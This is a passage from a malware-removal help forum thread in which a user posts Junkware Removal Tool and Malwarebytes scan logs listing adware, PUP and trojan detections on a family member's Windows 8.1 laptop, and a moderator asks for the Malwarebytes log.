    C:\AdwCleaner\AdwCleaner[S2].txt - [32837 Bytes] - [15/03/2017 14:00:26]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [24793 Bytes] ##########
     
  14. 2017/03/15
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.2 (03.10.2017)
    Operating System: Windows 8.1 Single Language x64
    Ran by User (Administrator) on 15-Mar-17 at 20:26:42.76
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 3

    Failed to delete: C:\Program Files (x86)\sogouinput (Folder)
    Successfully deleted: C:\Users\Public\thunder network (Folder)
    Successfully deleted: C:\Windows\system32\Tasks\SogouImeMgr (Task)

    Deleted the following from C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\prefs.js
    user_pref(browser.search.searchengine.alias, );
    user_pref(browser.search.searchengine.name, luck);
    user_pref(browser.search.searchengine.ref, );
    user_pref(browser.search.searchengine.ts, 1487229756);
    user_pref(browser.search.searchengine.type, );
    user_pref(browser.search.searchengine.uid, toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt);



    Registry: 0





    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 15-Mar-17 at 20:37:58.86
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  15. 2017/03/15
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    I still need MBAM log.
     
  16. 2017/03/19
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    Sorry for the late reply bcuz her laptop hangs too often. And there's 15k+ of infected objects (OMG)
    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 3/15/17
    Scan Time: 2:28 PM
    Logfile: mbam.txt
    Administrator: Yes

    -Software Information-
    Version: 3.0.6.1469
    Components Version: 1.0.75
    Update Package Version: 1.0.1506
    License: Trial

    -System Information-
    OS: Windows 8.1
    CPU: x64
    File System: NTFS
    User: ASUS\User

    -Scan Summary-
    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 432656
    Time Elapsed: 26 min, 46 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    -Scan Details-
    Process: 0
    (No malicious items detected)

    Module: 0
    (No malicious items detected)

    Registry Key: 5
    PUP.Optional.Elex.SHHKRST, HKLM\SOFTWARE\CLASSES\CLSID\{6710C780-E20E-4C49-A87D-321850ED3D7C}, Quarantined, [446], [316937],1.0.1506
    PUM.Optional.ProxyHijacker, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [15347], [-1],0.0.0
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}, Quarantined, [420], [182847],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE, Quarantined, [22], [211066],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE, Quarantined, [22], [211066],1.0.1506

    Registry Value: 12
    PUM.Optional.ProxyHijacker, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYSERVER, Quarantined, [15347], [250493],1.0.1506
    PUM.Optional.ProxyHijacker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [15347], [-1],0.0.0
    PUM.Optional.ProxyHijacker, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [15347], [-1],0.0.0
    PUM.Optional.ProxyHijacker, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYSERVER, Quarantined, [15347], [-1],0.0.0
    PUM.Optional.ProxyHijacker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [15347], [-1],0.0.0
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|HP, Quarantined, [420], [182847],1.0.1506
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|TAB, Quarantined, [420], [182847],1.0.1506
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|SP, Quarantined, [420], [182847],1.0.1506
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|SURL, Quarantined, [420], [182847],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE|DEBUGGER, Quarantined, [22], [211066],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE|DEBUGGER, Quarantined, [22], [211066],1.0.1506
    PUP.Optional.GoSearchMe, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\ABOUTURLS|TABS, Quarantined, [8599], [238864],1.0.1506

    Registry Data: 0
    (No malicious items detected)

    Data Stream: 0
    (No malicious items detected)

    Folder: 2532
    PUP.Optional.Ghokswa, C:\PROGRAMDATA\Newjob, Quarantined, [27], [325135],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application\VisualElements, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application\locales, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application\bin, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\PROGRAM FILES (X86)\Outbob, Delete-on-Reboot, [557], [360395],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#cdncache-a.akamaihd.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.tripadvisor.com.my, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#static1-ssl.dmcdn.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.paypalobjects.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#qsf.is.quoracdn.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#player.letvcdn.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#static1.dmcdn.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.cdn-net.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.ajaxcdn.org, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#www.iqiyi.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#s.ytimg.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82\3593b4ef-0c51-40e7-9f05-9756beebe440\index-dir, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\34724bf4-619a-4b24-b8a2-1f57864c5eb1\index-dir, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys\#irs01.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net\items\e6a00\storage.swf, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82\3593b4ef-0c51-40e7-9f05-9756beebe440, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8\34724bf4-619a-4b24-b8a2-1f57864c5eb1, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer\sys, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net\items\e6a00, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support\flashplayer, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net\items, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\aa.online-metrix.net\fpc.swf, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\cdncache-a.akamaihd.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.ajaxcdn.org\swf.swf, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.tripadvisor.com.my, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com\support, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.cdn-net.com\s.swf, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.paypalobjects.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\static1-ssl.dmcdn.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\aa.online-metrix.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\qsf.is.quoracdn.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\player.letvcdn.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\static1.dmcdn.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.cdn-net.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.ajaxcdn.org, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\cloud_route_details, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.iqiyi.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\s.ytimg.com, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\zh_TW, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\irs01.net, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\pt_BR, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\pt_PT, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\popup_partials, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\pt_PT, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\zh_TW, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\pt_BR, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\fil, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\kn, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\am, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ru, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ro, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\sk, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\sl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\sv, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\sw, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ta, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\te, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\th, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\tr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\pt, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\pl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\nl, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\nb, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ms, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\uk, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\vi, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ml, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\zh, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\lv, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\lt, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ko, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\iw, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\ja, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\it, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\id, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\hu, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\hr, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\hi, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\gu, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\fi, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\fa, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\et, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales\es, Delete-on-Reboot, [15], [329198],1.0.1506
